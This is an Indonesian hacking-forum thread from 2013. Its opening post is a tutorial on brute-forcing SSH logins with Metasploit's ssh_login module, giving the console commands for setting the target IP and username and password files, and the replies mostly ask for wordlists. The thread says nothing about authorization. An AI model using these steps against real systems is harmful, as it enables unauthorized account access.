Indonesian Back|Track Team
ssh attack with metasploit - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: ssh attack with metasploit (/thread-4314.html)

Pages: 1 2

ssh attack with metasploit - abdee_dillah - 03-10-2013

Assalamualikum teman-teman moga makin ganteng semuanya, oke gak usah lama-lama kali ini saya ingin berbagi teknik ssh brute force attack, namun kali ini saya menggunkan Metasploit sebagai toolsnya, sebelum melakukan brute force sebaiknya scan target terlebih dahulu apakah port ssh pada target status OPEN[nmap,zenmap etc] dan kemudian siapakan user list dan password list yang akan kita configurasikan dengan metasploit
setelah mempersipkan user list dan password list kemudian simpan file difolder yang diinginkan. Selanjutnya jalankan metasploit console dan ketikan perintah berikut
Code:
msf> use auxiliary/scanner/ssh/ssh_login
msf  auxiliary(ssh_login) > set RHOSTS [IP target]
RHOSTS => [IP target]
msf  auxiliary(ssh_login) > set USER_FILE /root/user
USER_FILE => /root/user
msf  auxiliary(ssh_login) > set PASS_FILE /root/pass
PASS_FILE => /root/pass
msf  auxiliary(ssh_login) > run

berikut hasil brute force
[Image: screenshot-4_zpsf476d392.jpg]

oke sekian dulu
http://www.abdesignerweb.com/blog/2013/02/ssh-attack-with-metasploit
sumber : http://www.metasploit.com/

RE: ssh attack with metasploit - [H2] - 03-10-2013

maap om masih kurang ngerti sane, yg dicenteng warna merah itu apa ya Smile

RE: ssh attack with metasploit - Elfnine-x3 - 03-11-2013

om... klo bisa ada SS langkah2nya om... soalx ane msh bingung tiba2 ada ss hasilx ^^..

RE: ssh attack with metasploit - iKONspirasi - 03-11-2013

wah berarti harus punya file wordlist user sama pass yg gede nih

thx udah share disini, cek kulkas Big Grin

RE: ssh attack with metasploit - abdee_dillah - 03-11-2013

(03-10-2013, 11:51 PM)[H2] Wrote: maap om masih kurang ngerti sane, yg dicenteng warna merah itu apa ya Smile

tanda panah yang merah ada pada gambar om?itu tingkatannya om..ada yg hanya user ada juga adm(admin) Smile

(03-11-2013, 02:13 AM)Elfnine-x3 Wrote: om... klo bisa ada SS langkah2nya om... soalx ane msh bingung tiba2 ada ss hasilx ^^..

masih bingung dimananya om?kan om tingal scan targetnya pake nmap dll, trus buka msfconsol, jalanin deh perintah diatas Smile

(03-11-2013, 05:47 AM)iKONspirasi Wrote: wah berarti harus punya file wordlist user sama pass yg gede nih

thx udah share disini, cek kulkas Big Grin

trimkasih om iKONs Smile

RE: ssh attack with metasploit - Acenk90 - 03-11-2013

wooh..., mantap om.., nice post..., thanks ya :-bd
+1 dari ane

RE: ssh attack with metasploit - joyosuicide - 03-11-2013

Nice inpoh om..^_^
mau praktekin aah..

RE: ssh attack with metasploit - greatzsaint - 03-16-2013

kalo boleh tau,bisa dijelaskan maksud dari command-commandnya mas ? saya baru belajar Smile
oh iya,mau tanya juga soal wordlist...klo misal password dari user tadi unik dan nggak ada di dalam wordlist apa ada cara lain untuk melakukan teknik ini ?

RE: ssh attack with metasploit - Unregistered - 03-17-2013

weh.. share wordlist buat user+pass nya juga dong om Big Grin yg lengkap yah Big Grin
nice share Smile kalo nyobain bruteforce tanpa wordlist bisa kagak yah ? kalo bis brp lama ?

RE: ssh attack with metasploit - hamdan_zenith - 03-17-2013

share wordlistnya donk om.. hehehe belum ada wordlist nii.. mau nyoba jg Smile